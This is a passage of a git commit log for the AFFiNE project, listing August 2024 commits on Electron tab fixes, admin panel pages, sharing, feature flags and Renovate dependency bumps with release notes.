| [is-svg](https://togithub.com/sindresorhus/is-svg ) | [`5.0.1` -> `5.1.0`](https://renovatebot.com/diffs/npm/is-svg/5.0.1/5.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.9.1` -> `2.9.3`](https://renovatebot.com/diffs/npm/jotai/2.9.1/2.9.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.9.1` -> `2.9.3`](https://renovatebot.com/diffs/npm/jotai/2.9.1/2.9.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [jotai-devtools](https://togithub.com/jotaijs/jotai-devtools ) | [`0.10.0` -> `0.10.1`](https://renovatebot.com/diffs/npm/jotai-devtools/0.10.0/0.10.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [jotai-devtools](https://togithub.com/jotaijs/jotai-devtools ) | [`0.10.0` -> `0.10.1`](https://renovatebot.com/diffs/npm/jotai-devtools/0.10.0/0.10.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [jotai-scope](https://togithub.com/jotaijs/jotai-scope ) | [`0.7.0` -> `0.7.1`](https://renovatebot.com/diffs/npm/jotai-scope/0.7.0/0.7.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [lib0](https://togithub.com/dmonad/lib0 ) | [`0.2.95` -> `0.2.97`](https://renovatebot.com/diffs/npm/lib0/0.2.95/0.2.97 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [lib0](https://togithub.com/dmonad/lib0 ) | [`0.2.95` -> `0.2.97`](https://renovatebot.com/diffs/npm/lib0/0.2.95/0.2.97 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [lint-staged](https://togithub.com/lint-staged/lint-staged ) | [`15.2.7` -> `15.2.9`](https://renovatebot.com/diffs/npm/lint-staged/15.2.7/15.2.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [lit](https://lit.dev/ ) ([source](https://togithub.com/lit/lit/tree/HEAD/packages/lit )) | [`3.1.4` -> `3.2.0`](https://renovatebot.com/diffs/npm/lit/3.1.4/3.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.408.0` -> `^0.428.0`](https://renovatebot.com/diffs/npm/lucide-react/0.408.0/0.428.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [mixpanel-browser](https://togithub.com/mixpanel/mixpanel-js ) | [`2.54.0` -> `2.55.0`](https://renovatebot.com/diffs/npm/mixpanel-browser/2.54.0/2.55.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [msw](https://mswjs.io ) ([source](https://togithub.com/mswjs/msw )) | [`2.3.4` -> `2.3.5`](https://renovatebot.com/diffs/npm/msw/2.3.4/2.3.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.7` -> `3.0.0-alpha.8` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.6` -> `3.0.0-alpha.7` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [nest-commander](https://nest-commander.jaymcdoniel.dev ) ([source](https://togithub.com/jmcdo29/nest-commander/tree/HEAD/pacakges/nest-commander )) | [`3.14.0` -> `3.15.0`](https://renovatebot.com/diffs/npm/nest-commander/3.14.0/3.15.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [nestjs-throttler-storage-redis](https://togithub.com/kkoomen/nestjs-throttler-storage-redis ) | [`^0.4.1` -> `^0.5.0`](https://renovatebot.com/diffs/npm/nestjs-throttler-storage-redis/0.4.4/0.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.15.1` -> `20.16.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | minor |
| [nx](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.5.3` -> `19.6.0`](https://renovatebot.com/diffs/npm/nx/19.5.3/19.6.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [openai](https://togithub.com/openai/openai-node ) | [`4.53.2` -> `4.56.0`](https://renovatebot.com/diffs/npm/openai/4.53.2/4.56.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| openresty/openresty | `1.25.3.1-0-buster` -> `1.25.3.2-0-buster` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | final | patch |
| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.46.1`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.46.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [postcss](https://postcss.org/ ) ([source](https://togithub.com/postcss/postcss )) | [`8.4.40` -> `8.4.41`](https://renovatebot.com/diffs/npm/postcss/8.4.40/8.4.41 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [prisma](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/cli )) | [`5.17.0` -> `5.18.0`](https://renovatebot.com/diffs/npm/prisma/5.17.0/5.18.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [react-hook-form](https://www.react-hook-form.com ) ([source](https://togithub.com/react-hook-form/react-hook-form )) | [`7.52.1` -> `7.52.2`](https://renovatebot.com/diffs/npm/react-hook-form/7.52.1/7.52.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-i18next](https://togithub.com/i18next/react-i18next ) | [`15.0.0` -> `15.0.1`](https://renovatebot.com/diffs/npm/react-i18next/15.0.0/15.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-refresh](https://reactjs.org/ ) ([source](https://togithub.com/facebook/react/tree/HEAD/packages/react )) | [`^0.10.0` -> `^0.14.0`](https://renovatebot.com/diffs/npm/react-refresh/0.10.0/0.14.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [react-resizable-panels](https://togithub.com/bvaughn/react-resizable-panels ) | [`2.0.22` -> `2.1.0`](https://renovatebot.com/diffs/npm/react-resizable-panels/2.0.22/2.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [react-router-dom](https://togithub.com/remix-run/react-router ) ([source](https://togithub.com/remix-run/react-router/tree/HEAD/packages/react-router-dom )) | [`6.25.1` -> `6.26.1`](https://renovatebot.com/diffs/npm/react-router-dom/6.25.1/6.26.1 ) | [](https://docs.renovatebot.com/merge
2024-08-19 07:51:51 +00:00
pengx17
4a89b1a5dd
fix(electron): adjust tab styles ( #7919 )
...

fix AF-1261
2024-08-19 06:15:06 +00:00
JimmFly
4916eea24f
feat(core): new share menu ( #7838 )
...
close AF-1224 AF-1216

2024-08-19 05:51:05 +00:00
EYHN
cfac3ebf1f
feat(core): workbench open doc in mode ( #7906 )
2024-08-19 02:37:33 +00:00
pengx17
e0a91f63d3
fix(core): tag menu should not accept keyboard shortcut when renaming tag ( #7913 )
...
fix #7890 , fix PD-1603
2024-08-18 08:29:25 +00:00
pengx17
23c73243ab
chore(electron): re-enable sentry for electron ( #7898 )
...
related
https://github.com/toeverything/AFFiNE/pull/7001
2024-08-17 04:32:49 +00:00
renovate[bot]
f324fa4719
chore: bump up storybook monorepo to v8 (major) ( #6068 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: EYHN <cneyhn@gmail.com >
2024-08-16 11:42:24 +00:00
EYHN
c822594882
feat(core): mode in query string ( #7904 )
2024-08-16 10:59:43 +00:00
EYHN
83716c2fd9
feat(core): share in workspace link ( #7897 )
...
ShareDocsService -> ShareDocsListService
ShareService -> ShareInfoService
(*new) ShareReaderService
`/share/:workspaceId/:docId` -> redirect to -> `/workspace/:workspaceId/:docId`
workspace loading process
1. find workspace in workspace list
2. (if not found) revalidate workspace list
3. (if still not found) try load share page
4. (if share page found) => share page
5. (if share page not found) => 404
6. (if workspace found) => workspace page
2024-08-16 09:12:18 +00:00
L-Sun
620d20710a
chore: bump bs ( #7899 )
...
Bump blocksuite from https://github.com/toeverything/blocksuite/pull/7934
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7985 @L-Sun
## Misc
- https://github.com/toeverything/BlockSuite/pull/7971 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7965 @doouding
2024-08-16 08:46:16 +00:00
CatsJuice
cfc367efe7
feat(component): add more customizable prop for radio-group with new story ( #7850 )
...

2024-08-16 07:19:16 +00:00
pengx17
69c507fded
fix(electron): do not use async callback in onBeforeSendHeaders ( #7894 )
...
it seems using async callback for onBeforeSendHeaders may crash the app.
the main reason why it is async is to read the cookies from session.
fix AF-1172
2024-08-16 05:17:47 +00:00
pengx17
b57ce4646f
chore(electron): adjust log level ( #7887 )
2024-08-16 05:17:46 +00:00
Brooooooklyn
dba024d561
docs: update LICENSE description ( #7869 )
2024-08-15 14:29:07 +00:00
darkskygit
e26ba48a45
feat: update ingress health check ( #7888 )
2024-08-15 12:16:25 +00:00
forehalo
e53dde7944
test(server): all instance variants ( #7882 )
2024-08-15 10:01:54 +00:00
forehalo
624f3514fc
feat(server): make permission a standalone module ( #7880 )
2024-08-15 10:01:52 +00:00
donteatfriedrice
ba8958f39b
fix: chat block peek view input reset height ( #7884 )
...
[BS-1202](https://linear.app/affine-design/issue/BS-1202/ai-chat-block-输入大段内容发送后输入框-resize-问题 )
2024-08-15 08:08:00 +00:00
pengx17
9af0e53ae2
fix(electron): header button not working on linux ( #7883 )
...
tested locally on windows/linux(vm)
2024-08-15 04:39:47 +00:00
forehalo
5a2f93f035
chore(admin): disable ai settings ( #7877 )
2024-08-15 02:50:46 +00:00
forehalo
9192ac4420
fix(server): command line nestjs does not have http adapter ( #7876 )
2024-08-14 13:41:23 +00:00
liuyi
57449c1530
fix(server): redirect to setup page if not initialized ( #7875 )
2024-08-14 21:02:16 +08:00
EYHN
89537e6892
refactor(core): separate editor & doc mode ( #7873 )
...
doc.mode -> primaryMode
(*new) editor.mode
New Service:
editor service
Change Mode:
```
const editor = useService(EditorService).editor;
editor.setMode('page')
```
Change primary mode
```
const editor = useService(EditorService).editor;
editor.doc.setPrimaryMode('page')
```
2024-08-14 11:43:03 +00:00
EYHN
50948318e0
feat(core): use emoji as folder icon ( #7842 )
...

2024-08-14 10:35:22 +00:00
EYHN
0504d0b0ff
feat(core): init feature flag service ( #7856 )
2024-08-14 10:35:21 +00:00
darkskygit
339c39c1ec
feat: improve prompt management ( #7853 )
2024-08-14 08:38:36 +00:00
forehalo
cd3924b8fc
Revert "fix(server): redirect to setup page if not initialized ( #7871 )"
...
This reverts commit 42b5ef7a8b .
2024-08-14 16:37:52 +08:00
liuyi
42b5ef7a8b
fix(server): redirect to setup page if not initialized ( #7871 )
2024-08-14 08:05:55 +00:00
donteatfriedrice
ad42418089
fix: add hover enter delay for ask ai button ( #7872 )
...
[AF-1075](https://linear.app/affine-design/issue/AF-1075/双击选中内容的时候,如果-toolbar-出现在内容上方,ai-action-会自动展开 )
2024-08-14 07:27:17 +00:00
forehalo
99e70c91e8
perf(core): avoid page init when only id required ( #7867 )
2024-08-14 05:22:18 +00:00
doouding
05ac3dbdcb
feat: bump bs ( #7866 )
2024-08-14 04:42:20 +00:00
JimmFly
994b539507
fix(admin): user form not dynamically updating as expected ( #7858 )
...
- Fixed the issue that a certain feature must be enabled when creating a user
- Fixed the issue that the modified content was not reset to the default content when exiting the user form without saving after modification
- Fixed the issue that the content did not switch as expected when switching user forms of different users
https://github.com/user-attachments/assets/02567021-9342-4ed1-be77-3bdcbb3d86ab
2024-08-14 04:28:15 +00:00
pengx17
d5edadabe6
fix(electron): cmd+num not working on mac ( #7865 )
...
fix AF-1248
hidden menu group + acceleratorWorksWhenHidden does not work on mac
2024-08-14 04:14:16 +00:00
JimmFly
05247bb24e
fix(admin): frequent query requests in the search ( #7854 )
2024-08-14 03:49:45 +00:00
forehalo
f69f026ac3
fix(admin): avoid frequent refetch ( #7863 )
2024-08-14 03:34:41 +00:00
forehalo
015247345c
chore(admin): organize massive routes ( #7857 )
2024-08-14 03:34:38 +00:00
forehalo
0ba516866f
fix(server): change password with token should be public ( #7855 )
2024-08-14 03:34:35 +00:00
forehalo
7afba6b8b5
fix(server): prelude should load both local and remote config file ( #7852 )
2024-08-14 03:34:33 +00:00
renovate
08cc15a55c
chore: bump up oxlint version to v0.7.1 ( #7846 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://togithub.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.7.0` -> `0.7.1`](https://renovatebot.com/diffs/npm/oxlint/0.7.0/0.7.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.7.1`](https://togithub.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#071---2024-08-12 )
[Compare Source](3ac02fd838...972492cc4d )
##### Features
- [`cc922f4`](https://togithub.com/oxc-project/oxc/commit/cc922f4 ) vscode: Provide config's schema to oxlint config files ([#​4826](https://togithub.com/oxc-project/oxc/issues/4826 )) (Don Isaac)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yMC4xIiwidXBkYXRlZEluVmVyIjoiMzguMjAuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-13 14:02:00 +00:00
DarkSky
24c34eb3fc
fix: admin panel schema ( #7851 )
2024-08-13 09:16:56 +00:00
JimmFly
ba5ba71f35
chore: add test for all collection and all tag ( #7687 )
2024-08-13 08:19:54 +00:00
pengx17
d4065fee78
fix(electron): adjust app-tabs-header styles ( #7849 )
2024-08-13 08:06:30 +00:00
pengx17
d86f7f41dc
fix: center peek support open in new tab ( #7848 )
2024-08-13 07:52:03 +00:00
liuyi
171a974904
fix(server): use timestamp with timezone ( #7847 )
2024-08-13 15:32:24 +08:00
forehalo
0ec1995add
fix(admin): organize admin panel ( #7840 )
2024-08-13 14:51:54 +08:00
JimmFly
6dea831d8a
fix(admin): handle error login status ( #7646 )
...
Fix unhandled error login status, modify style
https://github.com/user-attachments/assets/0b40807d-e17a-4d23-a168-4894adfa5998
2024-08-13 14:51:54 +08:00
JimmFly
b214003968
feat(admin): add prompt management page ( #7611 )
...
close AF-907
Supports online modification of prompt, but does not support custom ai key yet

2024-08-13 14:51:54 +08:00
JimmFly
bf6e36de37
feat(admin): add server runtime config settings ( #7618 )
2024-08-13 14:51:31 +08:00
JimmFly
7f7c0519a0
feat(admin): add config page to admin ( #7619 )
2024-08-13 14:38:39 +08:00
liuyi
83a9beed83
fix(electron): app got deleted when auto update on windows ( #7820 )
2024-08-13 14:26:26 +08:00
EYHN
1db6b9fe3b
refactor(infra): remove setimmediate ( #7821 )
2024-08-13 14:25:33 +08:00
JimmFly
ccf225c8f9
feat(admin): add self-host setup and user management page ( #7537 )
2024-08-13 06:11:03 +00:00
Lye Hongtao
dc519348c5
feat: bump bs ( #7836 )
2024-08-13 14:05:49 +08:00
renovate
10f4eaf2bd
chore: bump up vitest-mock-extended version to v2 ( #7584 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [vitest-mock-extended](https://togithub.com/eratio08/vitest-mock-extended ) | [`^1.3.1` -> `^2.0.0`](https://renovatebot.com/diffs/npm/vitest-mock-extended/1.3.2/2.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>eratio08/vitest-mock-extended (vitest-mock-extended)</summary>
### [`v2.0.0`](https://togithub.com/eratio08/vitest-mock-extended/releases/tag/v2.0.0 )
[Compare Source](https://togithub.com/eratio08/vitest-mock-extended/compare/v1.3.2...v2.0.0 )
##### chore
- Adjust package version to 2.0 ([b867078](b86707812b ))
##### BREAKING CHANGES
- Require at least vitest 2.0 as peer dependency
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzguMCIsInVwZGF0ZWRJblZlciI6IjM4LjIwLjEiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-08-13 04:03:07 +00:00
renovate
d365494fef
chore: bump up vite-plugin-dts version to v4 ( #7762 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [vite-plugin-dts](https://togithub.com/qmhc/vite-plugin-dts ) | [`3.9.1` -> `4.0.2`](https://renovatebot.com/diffs/npm/vite-plugin-dts/3.9.1/4.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>qmhc/vite-plugin-dts (vite-plugin-dts)</summary>
### [`v4.0.2`](https://togithub.com/qmhc/vite-plugin-dts/blob/HEAD/CHANGELOG.md#402-2024-08-09 )
[Compare Source](https://togithub.com/qmhc/vite-plugin-dts/compare/v4.0.1...v4.0.2 )
##### Bug Fixes
- ensure inserted index file be a module ([f93e98c](f93e98cd84 )), closes [#​365](https://togithub.com/qmhc/vite-plugin-dts/issues/365 )
### [`v4.0.1`](https://togithub.com/qmhc/vite-plugin-dts/blob/HEAD/CHANGELOG.md#401-2024-08-07 )
[Compare Source](https://togithub.com/qmhc/vite-plugin-dts/compare/v4.0.0...v4.0.1 )
##### Bug Fixes
- correctly match normal export ([589901f](589901fead )), closes [#​362](https://togithub.com/qmhc/vite-plugin-dts/issues/362 )
### [`v4.0.0`](https://togithub.com/qmhc/vite-plugin-dts/blob/HEAD/CHANGELOG.md#400-2024-08-06 )
[Compare Source](https://togithub.com/qmhc/vite-plugin-dts/compare/v3.9.1...v4.0.0 )
##### Bug Fixes
- remove global types for vue declaration files ([e873107](e8731077f3 )), closes [#​354](https://togithub.com/qmhc/vite-plugin-dts/issues/354 )
- resolve module preserve to esnext for rollup ([710400a](710400a276 )), closes [#​358](https://togithub.com/qmhc/vite-plugin-dts/issues/358 )
- sync diff line to mappings after transform ([cd5ba32](cd5ba32148 )), closes [#​356](https://togithub.com/qmhc/vite-plugin-dts/issues/356 )
- typescript lib path resolution for rollup in monorepo ([#​360](https://togithub.com/qmhc/vite-plugin-dts/issues/360 )) ([da4af65](da4af6542e ))
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4xOC4xNyIsInVwZGF0ZWRJblZlciI6IjM4LjIwLjEiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-08-13 03:48:23 +00:00
forehalo
69c64b2fc2
fix(core): checkout event ( #7844 )
2024-08-13 03:35:38 +00:00
forehalo
dc41ffbe2f
chore(core): enable mixpanel ignore_dnt flag ( #7841 )
2024-08-13 03:35:37 +00:00
JimmFly
9037e6695e
feat(core): add configuration for experimental features ( #7699 )
...
close AF-1218 AF-1219
Added configuration for experimental features
Example:
```
const blocksuiteFeatureFlags = {
...
enable_expand_database_block: {
displayName: 'Enable Expand Database Block',
description: 'Allows expanding database blocks for better view and management.',
feedbackType: 'discord',
displayChannel: ['stable', 'beta', 'canary', 'internal'],
restrictedPlatform: 'client'
},
enable_ai_onboarding: {
displayName: 'AI Onboarding',
description: 'Enables AI onboarding.',
displayChannel: [],
defaultState: true,
},
...
}
```

2024-08-13 02:26:05 +00:00
CatsJuice
6228b27271
feat(core): new theme editor poc ( #7810 )
2024-08-12 04:12:51 +00:00
CatsJuice
75e02bb088
feat(core): rewrite page-mode-switch with RadioGroup, bind hotkey with cmdk ( #7758 )
...
close AF-1170
- bump `@toeverything/theme`
- refactor page-mode-switch
- use global `<RadioGroup />`
- reuse for doc history
- remove `styled` usage
- bind hotkey via cmdk
- Update `<RadioGroup />` color scheme with latest design system
- Update right sidebar header tab style
- Update tooltip with shortcut for app nav button
2024-08-12 03:56:56 +00:00
hwangdev97
4ac9bd7790
feat(i18n): fix i18n en-Us & en json english style ( #7834 )
2024-08-12 03:19:13 +00:00
pengx17
a6169ab26a
fix: do not use globalShortcut for tab switching ( #7827 )
...
fix #7826
2024-08-11 07:56:47 +00:00
pengx17
d82f4b5461
fix: center peek responsiveness update ( #7814 )
...
fix PD-1407
2024-08-09 11:48:50 +00:00
EYHN
a579cc7716
fix(core): better search result ( #7819 )
2024-08-09 10:37:27 +00:00
EYHN
b993ab04df
fix(core): some doc missing in search result ( #7818 )
2024-08-09 10:37:24 +00:00
forehalo
eef9afd3ed
chore: bump base version to 0.16.0
2024-08-09 18:30:07 +08:00
Cats Juice
06d5d9719c
fix(core): wrong color of ai-subscribe button ( #7816 )
2024-08-09 09:44:09 +00:00
Cats Juice
f8e51112aa
fix(core): sidebar renaming menu pos ( #7798 )
2024-08-09 17:06:55 +08:00
Cats Juice
e8d5692062
fix(core): sidebar unauthorized user avatar should center vertically ( #7812 )
2024-08-09 16:52:29 +08:00
EYHN
d2b0ee40a8
fix(core): disable blocksuite indexer ( #7813 )
2024-08-09 08:24:44 +00:00
EYHN
3ad5170b71
fix(core): hidden open in split view in browser ( #7811 )
2024-08-09 07:50:07 +00:00
pengx17
8209e84842
chore(electron): disable parallel execution of electron tests ( #7789 )
2024-08-09 07:33:16 +00:00
pengx17
fc19180451
fix(electron): missing collection name in tab header ( #7807 )
...
fix AF-1177
2024-08-09 07:02:38 +00:00
pengx17
009b5353b1
fix(electron): shell should import renderer css in dev ( #7805 )
2024-08-09 07:02:34 +00:00
EYHN
4beedaa22c
fix(core): delete from folder not work ( #7806 )
2024-08-09 06:49:20 +00:00
CatsJuice
26fd9a4a1c
feat(component): add autoFocusConfirmButton for confirm-modal ( #7801 )
...
close #5813
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/LakojjjzZNf6ogjOVwKE/aff35b76-9f73-4d15-b2cb-c25b03e2e2c3.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/LakojjjzZNf6ogjOVwKE/aff35b76-9f73-4d15-b2cb-c25b03e2e2c3.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/LakojjjzZNf6ogjOVwKE/aff35b76-9f73-4d15-b2cb-c25b03e2e2c3.mp4 ">CleanShot 2024-08-09 at 11.25.46.mp4</video>
2024-08-09 05:50:22 +00:00
EYHN
b2c00a2618
